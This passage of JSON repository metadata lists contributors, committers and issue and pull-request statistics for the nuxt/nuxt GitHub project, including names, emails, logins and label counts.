Digabel","email":"loick.ledigabel@gmail.com","login":"loick","count":1},{"name":"LoneRifle","email":"LoneRifle","login":"LoneRifle","count":1},{"name":"LookinGit","email":"alook.in@yandex.ru","login":"LookinGit","count":1},{"name":"Louis Ramos","email":"75388869+wJoenn","login":"wJoenn","count":1},{"name":"Louis-Marie Michelin","email":"33673240+lmichelin","login":"lmichelin","count":1},{"name":"Luc","email":"luc.potage@gmail.com","login":"lucpotage","count":1},{"name":"Lucas","email":"lucasdraichi@gmail.com","login":"Draichi","count":1},{"name":"Lucas Löffel","email":"lucas@loeffel.io","login":"loeffel-io","count":1},{"name":"Luciano Tonet","email":"tonetlds@gmail.com","login":"lucianotonet","count":1},{"name":"Jamie Trip","email":"jamietrip@hotmail.nl","login":"Jamie4224","count":1},{"name":"Léonce Aklin","email":"leonce.aklin@zebrapig.com","login":"leonceaklin","count":1},{"name":"Maarten Van Hoof","email":"info@mrtnvh.com","login":"mrtnvh","count":1},{"name":"Maciej Jezierski","email":"maciej.jezier@gmail.com","login":"maciej-jezierski","count":1},{"name":"Maksim Nedoshev","email":"m0ksem1337@gmail.com","login":"m0ksem","count":1},{"name":"Michael Gale (he/him)","email":"michael.gale@outlook.com.au","login":"miclgael","count":1},{"name":"Michael Leaney","email":"leahciMic","login":"leahciMic","count":1},{"name":"Michael McAndrew","email":"michaelmcandrew@thirdsectordesign.org","login":"michaelmcandrew","count":1},{"name":"Michiel Doesburg","email":"3763566+mdoesburg","login":"mdoesburg","count":1},{"name":"Mikhail Novikov","email":"nt0x35@gmail.com","login":"notiv-nt","count":1},{"name":"Miljan Aleksic","email":"miljan@aleksic.es","login":"miljan-aleksic","count":1},{"name":"Mirodil","email":"mirodil007@gmail.com","login":"Mirodil","count":1},{"name":"Maxim","email":"73140396+MaximKing1","login":"MaximKing1","count":1},{"name":"Mishaa","email":"42717232+SirMishaa","login":"SirMishaa","count":1},{"name":"Mitsuki Fukunaga","email":"mtskf","login":"mtskf","count":1},{"name":"Moeen M","email":"17681023+mamapam","login":"mamapam","count":1},{"name":"Mohab Sameh","email":"37941642+mohab-sameh","login":"mohab-sameh","count":1},{"name":"Mohammad Hosein Feizi","email":"5635677+mhfeizi","login":"mhfeizi","count":1},{"name":"Mohammad M. Shahbazi","email":"shahbazi.mm@gmail.com","login":"mshahbazi","count":1},{"name":"MrDizzystick","email":"MrDizzystick","login":"MrDizzystick","count":1},{"name":"Muhamad Jamil","email":"rezaramdhani461@gmail.com","login":"Fanreza","count":1},{"name":"Mukund Shah","email":"39938037+mukundshah","login":"mukundshah","count":1},{"name":"Mykola Skrypets","email":"skrypets@gmail.com","login":"mskry","count":1},{"name":"Naim Ahmed Shuvo","email":"61267686+shuvo-me","login":"shuvo-me","count":1},{"name":"Manthankumar Satani","email":"satanimanthan@gmail.com","login":"itsmnthn","count":1},{"name":"Matthew Pietz","email":"sirlancelot","login":"sirlancelot","count":1},{"name":"Matthew Woods","email":"mattwoods9170@gmail.com","login":"mxttwoods","count":1},{"name":"Max Heilmann","email":"support@matix-media.net","login":"Matix-Media","count":1},{"name":"Max Programming","email":"51731966+max-programming","login":"max-programming","count":1},{"name":"Max Schmitt","email":"max@schmitt.mx","login":"mxschmitt","count":1},{"name":"MaxMonteil","email":"31447997+MaxMonteil","login":"MaxMonteil","count":1},{"name":"Marsel Shayhin (Phoenix Apps)","email":"18054980+phoenix-ru","login":"phoenix-ru","count":1},{"name":"Maxim Morev","email":"max.seainside@gmail.com","login":"MorevM","count":1},{"name":"Maël Quéau","email":"mael.queau99@gmail.com","login":"mael-queau","count":1},{"name":"Mechite","email":"50027352+Mechite","login":"Mechite","count":1},{"name":"Mehdi","email":"34148140+mehdi-coding","login":"mehdi-coding","count":1},{"name":"Mehdi Lahlou","email":"mlahlou@protonmail.ch","login":"medfreeman","count":1},{"name":"Mehmet","email":"38668796+productfrontenddeveloper","login":"productfrontenddeveloper","count":1},{"name":"Menthol","email":"bennetteson@gmail.com","login":"menthol","count":1},{"name":"Meo","email":"miaobuao@outlook.com","login":"miaobuao","count":1},{"name":"Mgs. M. Rizqi Fadhlurrahman","email":"rizqirizqi23@gmail.com","login":"rizqirizqi","count":1},{"name":"Michael","email":"axel0726@gmail.com","login":"dzantiev","count":1},{"name":"Michael Cole","email":"github@michaelcole.com","login":"MichaelJCole","count":1}],"past_year_committers":[{"name":"Daniel Roe","email":"daniel@roe.dev","login":"danielroe","count":572},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":371},{"name":"Julien Huang","email":"julien.huang@outlook.fr","login":"huang-julien","count":60},{"name":"Alex Liu","email":"dsa1314@gmail.com","login":"Mini-ghost","count":50},{"name":"@beer","email":"47961062+iiio2","login":"iiio2","count":35},{"name":"Matej Černý","email":"matej.cern@gmail.com","login":"cernymatej","count":28},{"name":"Bobbie Goede","email":"bobbiegoede@gmail.com","login":"BobbieGoede","count":25},{"name":"xjccc","email":"546534045@qq.com","login":"xjccc","count":21},{"name":"山吹色御守","email":"85992002+KazariEX","login":"KazariEX","count":16},{"name":"Robin","email":"robin.kehl@singular-it.de","login":"OrbisK","count":15},{"name":"Damian Głowala","email":"damian.glowala.rebkow@gmail.com","login":"DamianGlowala","count":14},{"name":"Florian Heuberger","email":"10813063+Flo0806","login":"Flo0806","count":10},{"name":"github-actions[bot]","email":"41898282+github-actions[bot]","login":"github-actions[bot]","count":9},{"name":"Harlan Wilton","email":"harlan@harlanzw.com","login":"harlan-zw","count":9},{"name":"Alexander Lichter","email":"github@lichter.io","login":"manniL","count":9},{"name":"Anthony Fu","email":"anthonyfu117@hotmail.com","login":"antfu","count":8},{"name":"Sébastien Chopin","email":"seb@nuxt.com","login":"atinux","count":7},{"name":"John Tanzer","email":"82201261+moshetanzer","login":"moshetanzer","count":5},{"name":"Maxime Pauvert","email":"maximepvrt@gmail.com","login":"maximepvrt","count":5},{"name":"Saeid Zareie","email":"65568529+Saeid-Za","login":"Saeid-Za","count":5},{"name":"Joaquín Sánchez","email":"userquin@gmail.com","login":"userquin","count":4},{"name":"Ryota Watanabe","email":"43837308+wattanx","login":"wattanx","count":4},{"name":"纸鹿/Zhilu","email":"hi@zhilu.cyou","login":"L33Z22L11","count":3},{"name":"Yizack Rangel","email":"yizackr@gmail.com","login":"Yizack","count":3},{"name":"Peter Budai","email":"peterbudai@hotmail.com","login":"peterbud","count":3},{"name":"Octavio Araiza","email":"60367571+8ctavio","login":"8ctavio","count":3},{"name":"Michael Brevard","email":"yonshi29@gmail.com","login":"GalacticHypernova","count":3},{"name":"Max","email":"maximogarciamtnez@gmail.com","login":"onmax","count":3},{"name":"Hugo Richard","email":"hugo.richard@epitech.eu","login":"HugoRCD","count":3},{"name":"Horu","email":"73709188+HigherOrderLogic","login":"HigherOrderLogic","count":3},{"name":"Guillaume Chau","email":"guillaume.b.chau@gmail.com","login":"Akryum","count":3},{"name":"David Stack","email":"2013388+davidstackio","login":"davidstackio","count":3},{"name":"Connor Roberts","email":"32241825+murshex","login":"murshex","count":3},{"name":"Connor Pearson","email":"cjpearson","login":"cjpearson","count":3},{"name":"Camille Coutens","email":"41164034+Kamsou","login":"Kamsou","count":3},{"name":"一纸忘忧","email":"54543761+ikxin","login":"ikxin","count":2},{"name":"Maik Kowol","email":"maik.s.kowol@gmail.com","login":"94726","count":2},{"name":"Martins Zeltins","email":"34019878+martinszeltins","login":"martinszeltins","count":2},{"name":"Norbiros","email":"norbiros@protonmail.com","login":"Norbiros","count":2},{"name":"Peter Buglavecz","email":"buggio.dev@gmail.com","login":"buglavecz","count":2},{"name":"Peter Radko","email":"cmtvpetya@gmail.com","login":"Gwynerva","count":2},{"name":"Stephen Jason Wang","email":"stephenjasonwang@gmail.com","login":"stephenjason89","count":2},{"name":"Vuk Marjanovic","email":"71182200+vmrjnvc","login":"vmrjnvc","count":2},{"name":"bjoaquinc","email":"75667013+bjoaquinc","login":"bjoaquinc","count":2},{"name":"翠 / green","email":"green@sapphi.red","login":"sapphi-red","count":2},{"name":"Adrien Foulon","email":"6115458+Tofandel","login":"Tofandel","count":2},{"name":"Anoesj Sadraee","email":"anoesjsadraee@gmail.com","login":"Anoesj","count":2},{"name":"Clément Ollivier","email":"clement.o2p@gmail.com","login":"clemcode","count":2},{"name":"Daniel Kelly","email":"me@danielkelly.io","login":"danielkellyio","count":2},{"name":"Daniel Rentz","email":"danielrentz","login":"danielrentz","count":2},{"name":"Daniel Slepov","email":"danil.slepov@gmail.com","login":"imslepov","count":2},{"name":"Inesh Bose","email":"dev@inesh.xyz","login":"ineshbose","count":2},{"name":"Lorenzo Fiamingo","email":"personal@lorenzofiamingo.com","login":"lorenzofiamingo","count":2},{"name":"Mehmet","email":"hi@productdevbook.com","login":"productdevbook","count":2},{"name":"Pooya Parsa","email":"pooya@pi0.io","login":"pi0","count":1},{"name":"RBV1","email":"bogdanromanchyc@gmail.com","login":"RBV1","count":1},{"name":"RDistinct","email":"76834983+RDistinct","login":"RDistinct","count":1},{"name":"Raed Abdennadher","email":"abdennadher.raed@gmail.com","login":"RaedAbr","count":1},{"name":"Revadike","email":"4411977+Revadike","login":"Revadike","count":1},{"name":"Rich Harris","email":"hello@rich-harris.dev","login":"Rich-Harris","count":1},{"name":"Rohan Dhimal","email":"64955576+drowhannn","login":"drowhannn","count":1},{"name":"Romain Hamel","email":"rom.hml@gmail.com","login":"romhml","count":1},{"name":"Sam Blowes","email":"samblowes@hotmail.com","login":"blowsie","count":1},{"name":"Sigrid Huemer","email":"32902192+s1gr1d","login":"s1gr1d","count":1},{"name":"Stephanie Smith","email":"stephiescastle","login":"stephiescastle","count":1},{"name":"Sébastien LeBlanc","email":"mrsebastienleblanc@icloud.com","login":"mrleblanc101","count":1},{"name":"Tamás H.","email":"36476318+Tamas-hi","login":"Tamas-hi","count":1},{"name":"Arturs Jansons","email":"artur.janson@yandex.ru","login":"iegik","count":1},{"name":"Arkadiusz Sygulski","email":"arkadiusz@sygulski.pl","login":"Aareksio","count":1},{"name":"Phojie Rengel","email":"phojrengel@gmail.com","login":"phojie","count":1},{"name":"Alexandru Ungureanu","email":"alex.victor.ungureanu@gmail.com","login":"unguul","count":1},{"name":"Alexander","email":"github@colorman.me","login":"TheColorman","count":1},{"name":"Alex","email":"a.hywax@gmail.com","login":"hywax","count":1},{"name":"Aleksander Błaszkiewicz","email":"kqmdjc8@gmail.com","login":"ablaszkiewicz","count":1},{"name":"Alan Schio","email":"6757777+schirrel","login":"schirrel","count":1},{"name":"Adam DeHaven","email":"2229946+adamdehaven","login":"adamdehaven","count":1},{"name":"Nestor Vera","email":"nestorvera@me.com","login":"hacknug","count":1},{"name":"Nikolay","email":"RokeAlvo@gmail.com","login":"RokeAlvo","count":1},{"name":"Nimit012","email":"110910723+Nimit012","login":"Nimit012","count":1},{"name":"Nishant Aanjaney Jalan","email":"cybercoder.nishant@gmail.com","login":"cybercoder-naj","count":1},{"name":"Nolhan","email":"nolhan.dev@gmail.com","login":"Nonolanlan1007","count":1},{"name":"Ondrej Brendy","email":"51334691+bandiasek","login":"bandiasek","count":1},{"name":"Jeffrey van den Hondel","email":"jeffreyhondel@gmail.com","login":"jeffreyvdhondel","count":1},{"name":"Антон Стасюк","email":"90934356+11Alone11","login":"11Alone11","count":1},{"name":"wzc520pyfm","email":"1528857653@qq.com","login":"wzc520pyfm","count":1},{"name":"wuiyang","email":"wuiyang@live.com","login":"wuiyang","count":1},{"name":"watsonhaw5566","email":"watsonhaw@hotmail.com","login":"watsonhaw5566","count":1},{"name":"skmedix","email":"3246162+skmedix","login":"skmedix","count":1},{"name":"mxmxmmgg","email":"mxmxmmgg25@gmail.com","login":"mxmxmmgg","count":1},{"name":"mustafa60x","email":"mturkoz93@gmail.com","login":"mustafa60x","count":1},{"name":"mianlang","email":"15700077520@qq.com","login":"mianlang","count":1},{"name":"letianpailove","email":"113023596+letianpailove","login":"letianpailove","count":1},{"name":"kyumoon","email":"fe_developer@kakao.com","login":"kyumoon","count":1},{"name":"imreegall","email":"45339188+imreegall","login":"imreegall","count":1},{"name":"dwood-csi","email":"118394209+dwood-csi","login":"dwood-csi","count":1},{"name":"duolaameng","email":"67215517+1411430556","login":"1411430556","count":1},{"name":"derHodrig","email":"53934248+derHodrig","login":"derHodrig","count":1},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":1},{"name":"crisarji","email":"36678235+crisarji","login":"crisarji","count":1},{"name":"awfulness","email":"135758008+awfulness","login":"awfulness","count":1},{"name":"Zakhar Shymanchyk","email":"zahar.shamanchik@gmail.com","login":"zshimanchik","count":1},{"name":"Yauheni Vasiukevich","email":"evgeniywas@gmail.com","login":"EvgenyWas","count":1},{"name":"Vahagn Zaqaryan","email":"vahagn.zaqarian@gmail.com","login":"Vahagn-Zaqaryan","count":1},{"name":"हिमांशु","email":"sharmahimanshu15082007@gmail.com","login":"CodeMan62","count":1},{"name":"Vachmara","email":"valentinchmara@gmail.com","login":"vachmara","count":1},{"name":"Typed SIGTERM","email":"typed.sigterm@gmail.com","login":"typed-sigterm","count":1},{"name":"Trung Dang","email":"dangquoctrung123@gmail.com","login":"NamesMT","count":1},{"name":"Thomas","email":"ThomasWT","login":"ThomasWT","count":1},{"name":"Gustavo Aquino Torres Teixeira","email":"gustteixeira@yahoo.com.br","login":"guska8","count":1},{"name":"Hans Tu","email":"87744802+ChiaHanTu","login":"ChiaHanTu","count":1},{"name":"Hashim Kalam","email":"128583658+hashimkalam","login":"hashimkalam","count":1},{"name":"Haythem Frikha","email":"44573436+Flamenate","login":"Flamenate","count":1},{"name":"Hillary","email":"tenskap@gmail.com","login":"hillaryke","count":1},{"name":"Hinata Oishi","email":"92960051+te19oishi","login":"te19oishi","count":1},{"name":"Huseyn Guliyev","email":"husayt@gmail.com","login":"husayt","count":1},{"name":"Hussain Panahy","email":"144150970+HP8585","login":"HP8585","count":1},{"name":"Ibrahimm","email":"testingacount1426@gmail.com","login":"Ibra-cesar","count":1},{"name":"Idorenyin Udoh","email":"idorenyinudoh10@outlook.com","login":"idorenyinudoh","count":1},{"name":"Igor Kononenko","email":"igorkono343@gmail.com","login":"igorexa34314","count":1},{"name":"IlyaL","email":"ilyaliao324@gmail.com","login":"ilyaliao","count":1},{"name":"Ivan Martianov","email":"ivansky18ru@gmail.com","login":"ivansky","count":1},{"name":"Jacky Lam","email":"jacky.lam@r2studiohk.com","login":"jackylamhk","count":1},{"name":"James","email":"lanzonprojects@gmail.com","login":"Koshux","count":1},{"name":"Mihailo Bursac","email":"mihib_90@yahoo.com","login":"djixadin","count":1},{"name":"Johannes Buchholz","email":"jhony1104@use.startmail.com","login":"jhony1104","count":1},{"name":"Jonas Thelemann","email":"e-mail@jonas-thelemann.de","login":"dargmuesli","count":1},{"name":"Kevin Deng 三咲智子","email":"sxzz@sxzz.moe","login":"sxzz","count":1},{"name":"Kraig Burrows","email":"zync@zyncinteractive.com.au","login":"zync09","count":1},{"name":"Kyohei Sonokawa","email":"70838736+kyohei-23","login":"kyohei-23","count":1},{"name":"Lansi","email":"5398495+lansi951","login":"lansi951","count":1},{"name":"Leonid","email":"81681712+john-psina","login":"john-psina","count":1},{"name":"Luke Nelson","email":"luke@nelson.zone","login":"luc122c","count":1},{"name":"Marko","email":"boska0712@gmail.com","login":"aussieboi","count":1},{"name":"Mateleo","email":"mateleo78@gmail.com","login":"Mateleo","count":1},{"name":"Matt","email":"34515355+matt-clegg","login":"matt-clegg","count":1},{"name":"Mukund Shah","email":"39938037+mukundshah","login":"mukundshah","count":1},{"name":"Teena","email":"76698025+franklin-tina","login":"franklin-tina","count":1},{"name":"Ali Soueidan","email":"hello@alisoueidan.com","login":"lazercaveman","count":1},{"name":"Alois Sečkár","email":"ellrohir@seznam.cz","login":"AloisSeckar","count":1},{"name":"Amitav Chris Mostafa","email":"52080326+semibroiled","login":"semibroiled","count":1},{"name":"Anders Bootsmann Larsen","email":"ab@lait.dk","login":"bootsmann1995","count":1},{"name":"Andrei Hudalla","email":"andrei.hudalla@outlook.com","login":"paranoidPhantom","count":1},{"name":"Andrej Adamcik","email":"adamcikado@gmail.com","login":"adamcikado","count":1},{"name":"Oskar Lebuda","email":"o.lebuda@gmail.com","login":"OskarLebuda","count":1},{"name":"Jan-Niklas W.","email":"6104311+niklas-wortmann","login":"niklas-wortmann","count":1},{"name":"Baptiste Leproux","email":"leproux.baptiste@gmail.com","login":"larbish","count":1},{"name":"Ben Hong","email":"ben@bencodezen.io","login":"bencodezen","count":1},{"name":"Ben McCann","email":"322311+benmccann","login":"benmccann","count":1},{"name":"Bobby","email":"34955679+xanzhu","login":"xanzhu","count":1},{"name":"Charlie ✨","email":"18888351756@163.com","login":"CharleeWa","count":1},{"name":"Chriest Yu","email":"jcppman@gmail.com","login":"jcppman","count":1},{"name":"Claudiu","email":"sofuxro@yahoo.com","login":"sofuxro","count":1},{"name":"Clayton Chew","email":"claytonchew","login":"claytonchew","count":1},{"name":"David Marr","email":"44376+marr","login":"marr","count":1},{"name":"David Nahodyl","email":"david@gearboxgo.com","login":"Smef","count":1},{"name":"Dennis Adriaansen","email":"adriaansendennis@gmail.com","login":"dennisadriaans","count":1},{"name":"DipakHalkude","email":"128908555+DipakHalkude","login":"DipakHalkude","count":1},{"name":"Dog","email":"104234930+dgxo","login":"dgxo","count":1},{"name":"Efraim","email":"45230414+EfraimGENC","login":"EfraimGENC","count":1},{"name":"Erwan Jugand","email":"47392755+erwanjugand","login":"erwanjugand","count":1},{"name":"Ezra Ashenafi","email":"eazash22@gmail.com","login":"Eazash","count":1},{"name":"Farnabaz","email":"farnabaz@gmail.com","login":"farnabaz","count":1},{"name":"Felix Gabler","email":"felix.gabler98@gmail.com","login":"felixgabler","count":1},{"name":"Francesco Agnoletto","email":"Francesco.agnoletto92@gmail.com","login":"Kornil","count":1},{"name":"Guspan Tanadi","email":"36249910+guspan-tanadi","login":"guspan-tanadi","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-11-10T00:00:15.262Z","repositories_count":6106058,"commits_count":923982462,"contributors_count":36010550,"owners_count":1115703,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"nuxt/nuxt","html_url":"https://github.com/nuxt/nuxt","last_synced_at":"2025-10-31T01:00:26.099Z","status":null,"issues_count":6006,"pull_requests_count":6861,"avg_time_to_close_issue":11692022.568315933,"avg_time_to_close_pull_request":786694.3987760503,"issues_closed_count":4401,"pull_requests_closed_count":6046,"pull_request_authors_count":587,"issue_authors_count":3401,"avg_comments_per_issue":4.1501831501831505,"avg_comments_per_pull_request":2.495700335228101,"merged_pull_requests_count":5383,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":1417,"past_year_pull_requests_count":2726,"past_year_avg_time_to_close_issue":737819.0976220275,"past_year_avg_time_to_close_pull_request":257019.33730684326,"past_year_issues_closed_count":799,"past_year_pull_requests_closed_count":2265,"past_year_pull_request_authors_count":196,"past_year_issue_authors_count":964,"past_year_avg_comments_per_issue":2.2794636556104444,"past_year_avg_comments_per_pull_request":3.2179016874541455,"past_year_bot_issues_count":4,"past_year_bot_pull_requests_count":1269,"past_year_merged_pull_requests_count":2001,"created_at":"2023-05-09T11:07:04.315Z","updated_at":"2025-10-31T01:00:26.101Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","issue_labels_count":{"table":{"pending triage":4158,"3.x":2932,"needs reproduction":798,"bug":578,"enhancement":438,"2.x":413,"upstream":406,"nitro":324,"🔨 p3-minor-bug":286,"🍰 p2-nice-to-have":278,"possible regression":230,"good first issue":221,"workaround available":219,"discussion":188,"closed-by-bot":188,"🔨 p3-minor":183,"documentation":167,"types":122,"vite":101,"dx":92,"❗ p4-important":78,"upstream-bug":76,"pages":65,"layers":60,"performance":60,"windows":47,"server components":46,"4.x":36,"needs details":30,"pending":30,"✨ good reproduction":26,"👉 good first issue":23,"chore":23,"cli":22,"⛔️ can be closed":21,"inline styles":18,"stale":17,"kit":16,"webpack":15,"suspense":14,"🧹 p1-chore":10,"test-utils":6,"refactor":5,"❌ won't do":4,"waiting for dependency":4,"app":4,"5.x":3,"a11y":3,"⚠️ breaking change":3,"question":3,"available soon":3,"components":3,"rolldown-vite":2,"🔥 p5-urgent":2,"bun":2,"good reproduction ✨":2,"schema":1,"rspack":1,"ui-templates":1,"postcss":1}},"pull_request_labels_count":{"table":{"3.x":5221,"chore":2472,"bug":1276,"documentation":724,"enhancement":443,"4.x":344,"🔨 p3-minor-bug":281,"performance":203,"2.x":154,"🍰 p2-nice-to-have":127,"refactor":93,"test":82,"dx":81,"types":69,"🔨 p3-minor":69,"vite":66,"pages":40,"❗ p4-important":39,"nitro":37,"kit":32,"server components":27,"schema":24,"⚠️ breaking change":20,"layers":20,"webpack":18,"pending triage":11,"inline styles":10,"javascript":9,"dependencies":9,"discussion":7,"🧹 p1-chore":6,"upstream":6,"cli":6,"pending":4,"suspense":3,"possible regression":3,"needs reproduction":3,"windows":2,"waiting for dependency":2,"test-utils":2,"a11y":2,"rspack":2,"workaround available":1,"🧷 edge release":1,"components":1,"closed-by-bot":1,"5.x":1}},"issue_author_associations_count":{"table":{"NONE":4759,"CONTRIBUTOR":840,"MEMBER":394,"COLLABORATOR":13}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":4254,"MEMBER":2082,"NONE":466,"COLLABORATOR":59}},"issue_authors":{"table":{"danielroe":114,"pi0":66,"martinszeltins":46,"bbhxwl":44,"huang-julien":43,"manniL":37,"Barbapapazes":30,"daniluk4000":22,"agracia-foticos":22,"brandonlee121":21,"mrleblanc101":21,"DamianGlowala":20,"kingyue737":20,"enkot":19,"TheAlexLichter":18,"ElYaiko":18,"moshetanzer":17,"IlyaSemenov":17,"arifcartaba":17,"imcm7":17,"MickL":16,"Maakdev":16,"cernymatej":15,"userquin":15,"mkierdev":15,"Gwynerva":14,"maximepvrt":13,"tersengat":12,"OrbisK":12,"gllinzbk1":12,"dargmuesli":12,"Atinux":12,"jd-solanki":12,"Hebilicious":12,"renovate[bot]":12,"linpengteng":11,"mklueh":11,"fabis94":11,"fabianwohlfart":11,"silverbackdan":11,"joli5986zD":10,"hecktarzuli":10,"Mini-ghost":10,"mickosi":9,"BobbieGoede":9,"Aareksio":9,"maksimdrosdov":9,"CernyMatej":9,"toniengelhardt":9,"ghost":9,"mcrapts":9,"cjpearson":8,"baixiaoyu2997":8,"oom-":8,"ahoiroman":8,"raminjafary":8,"warflash":8,"serkodev":8,"adamdehaven":8,"mercs600":8,"gyhyfj":8,"nosizejosh":8,"Lehoczky":8,"harlan-zw":7,"RomanSkrypnik":7,"facexyy":7,"andysay":7,"guy-confetti":7,"frasza":7,"wokalek":7,"carbdias":7,"alSergey":7,"TheDutchCoder":7,"mhdSid":7,"NamesMT":7,"rchl":7,"Timkor":7,"RodrigoProjects":7,"AABBCC-cloud":7,"BananaAcid":7,"Rigo-m":7,"johnjenkins":7,"Predota":7,"dulnan":7,"goonaudrey":7,"terkampret":7,"Q16solver":7,"jongmin4943":7,"Foddie2":7,"codeflorist":7,"ennioVisco":7,"trandaison":7,"sportsthelook":7,"miosenpai":6,"mak7an":6,"geminigeek":6,"DawidKopys":6,"cdwmhcc":6,"AloisSeckar":6,"wangrunze2023":6,"kaaax0815":6,"katerlouis":6,"gxres042":6,"dword-design":6,"productdevbook":6,"xjccc":6,"tobiasdiez":6,"luc122c":6,"nicky1038":6,"mrniamster":6,"guska8":6,"bmulholland":6,"stephenjason89":6,"TangsWang":6,"guaijie":6,"Rednas83":6,"rudolfbyker":6,"niklaswolf":6,"carlosvaldesweb":6,"or2e":6,"becem-gharbi":6,"CodeCube0":5,"joffreyBerrier":5,"Jannick94":5,"fikirmdn27":5,"milelazar":5,"AndreyYolkin":5,"f754699":5,"zumm":5,"tibineagu":5,"xuzhihui123":5,"noook":5,"timhn-bm":5,"vinothkbest":5,"logotip4ik":5,"toddpadwick":5,"VividLemon":5,"slarrasoain":5,"paro-paro":5,"pont1s":5,"SebbeJohansson":5,"nicolaspayot":5,"xxwangkaimin":5,"posva":5,"zsk-coder":5,"tobychidi":5,"pgraug":5,"RijaCloud":5,"KamilBeda":5,"darioferderber":5,"matt-clegg":5,"MikeBellika":5,"OrlS15":5,"xtoolkit":5,"kstraszewski":5,"HigherOrderLogic":5,"serhii-chernenko":5,"mrc-bsllt":5,"vis97c":5,"BenjaminOddou":5,"Akryum":5,"nethriis":5,"GrantGryczan":5,"bufarda504greenly":5,"gibkigonzo":5,"TimGuendel":5,"Aietes":4,"mschoeffmann":4,"xak2000":4,"Venegrad":4,"BlueskyFR":4,"tenfei4":4,"luca-smartpricing":4,"suningkooboo":4,"omar-labana":4,"acidjazz":4,"akfakf0509":4,"imding":4,"hendrikheil":4,"teleskop150750":4,"bf":4,"zumotuvtrovergg":4,"Ayax0":4,"tanglongyan":4,"marr":4,"ilyamsts":4,"CorrM":4,"nopeless":4,"adnseek":4,"dethdkn":4,"Curs3W4ll":4,"Jannchie":4,"blowsie":4,"arsengoian":4,"Xenossolitarius":4,"insub":4,"ltroya-as":4,"miku-nl":4,"cosbgn":4,"1877666":4,"misaon":4,"cybercoder-naj":4,"n0099":4,"FreekVR":4,"v0id-4lpz":4,"bernhardberger":4,"DidoMarchet":4,"tada5hi":4,"mahanteshaCloudMPower":4,"abarke":4,"yooneskh":4,"vedmant":4,"GalacticHypernova":4,"genu":4,"laventnc":4,"nonehub":4,"sajadhzj":4,"mihail727":4,"heavywar":4,"AntonKozhukhar":4,"Timtendo12":4,"itsmnthn":4,"MichaelJCole":4,"madebyfabian":4,"flapili":4,"edwh":4,"mark980828":4,"P4sca1":4,"lxccc812":4,"MiniDigger":4,"Julien-Martin":4,"michealroberts":4,"gyxoBka":4,"luckilyhang":4,"some-user123":4,"inthegreenwild":4,"xushnudbek20":4,"bippan1407":4,"mitjans":4,"oleghalin":4,"artem-kostylev":4,"minkoonim":4,"yassilah":4,"RifatMahmudno-1":4,"localusercamp":4,"septatrix":4,"PolinaTcaciuc":4,"stefanprobst":4,"bitbytebit1":4,"sts-ryan-holton":4,"alexcroox":4,"zecar":4,"hecateball":4,"oripka":3,"Tofandel":3,"LuXDAmore":3,"hmuyin":3,"withgogo":3,"brc-dd":3,"max06":3,"marifcelik":3,"saturn4er":3,"Ragura":3,"joel-wenzel":3,"zengkaii":3,"ChurikiTenna":3,"ChrisGV04":3,"szulcus":3,"Bombastickj":3,"WooHoo-Wu":3,"antoinerey":3,"lutejka":3,"iBobik":3,"thhary":3,"JarvisChao":3,"gitFoxCode":3,"konkarin":3,"simonmaass":3,"Saeid-Za":3,"ezekel":3,"ibockowsky":3,"yschroe":3,"vinayakkulkarni":3,"luckyloo1730":3,"mateusavila":3,"leoVetterli":3,"lukaszflorczak":3,"prof-schnitzel":3,"devmini1203":3,"Flashantik":3,"nestle49":3,"castrogarciajs":3,"wJoenn":3,"cawa-93":3,"peralta":3,"hanneskuettner":3,"jsedanoj":3,"tommie":3,"Maxbsy":3,"awdr74100":3,"binbin0916":3,"deleteme":3,"robertyclin":3,"Alireza1996Sh":3,"Ischafak":3,"DanSnow":3,"Rusinas":3,"FlorianWerndl":3,"bufarda504skelton":3,"simplenotezy":3,"briandee":3,"rahulkumarsingh73690":3,"kangelopoulos":3,"mullet627":3,"edimitchel":3,"divine":3,"jpengelbrecht":3,"dosstx":3,"yunyuyuan":3,"matthew-dean":3,"OsamaHaikal":3,"brawaru":3,"Szymon-dziewonski":3,"Siilwyn":3,"command-tab":3,"sholohov":3,"axolo":3,"pixelpaulaus":3,"andreww2012":3,"rocketiscool":3,"xuxchao":3,"alex-eliot":3,"onmax":3,"stefanobartoletti":3,"yisibell":3,"EmilyYond":3,"niddu85":3,"benedictleejh":3,"kaikaibenkai":3,"Jesus82":3,"fhqiypmb":3,"pimlie":3,"frbuceta":3,"Fabioni":3,"mikeCrafted":3,"vanminhquangtri":3,"smastrom":3,"then3rdman":3,"AndrewBogdanovTSS":3,"ThisAccountHasBeenSuspended":3,"cyberalien":3,"josuelrocha":3,"connecteev":3,"typed-sigterm":3,"yesworld":3,"zguig52":3,"devops3199":3,"jrutila":3,"AdrianFahrbach":3,"acemero-dev":3,"DavidDeSloovere":3,"sharifzadesina":3,"Ingramz":3,"pratamatama":3,"mktcode":3,"sync42johnny":3,"c-schwan":3,"snakysnake":3,"Ray0907":3,"devonik":3,"ronenteva":3,"a1mersnow":3,"mcpanl":3,"abdulrahmanhenedy":3,"Dominic-Marcelino":3,"skoenfaelt":3,"jeannen":3,"dextersiah":3,"Cocoa-C":3,"lassediercks":3,"georgesaliba":3,"chenyuncai":3,"dhwid":3,"bootsmann1995":3,"leeovery":3,"hybridherbst":3,"mrauhu":3,"Eazash":3,"NtchPlayer":3,"OversensitiveCat":3,"breizhwave":3,"icai":3,"rylanharper":3,"xxRockOnxx":3,"hermesalvesbr":3,"yveeven":3,"avinean":3,"JBustin":3,"fearart":3,"jxk-developer":3,"cfab":3,"jonathan-rvezy":3,"Phoebe-Fosbery":3,"tsiotska":3,"cadenzah":3,"FatNerdPeng":3,"frederic117":3,"Fnxxxxo":3,"R0N1n-dev":3,"markbrockhoff":3,"tejassyndell":3,"RezaErfani67":3,"Maiquu":3,"yazfield":3,"jcppman":3,"ShayanTheNerd":3,"Triloworld":3,"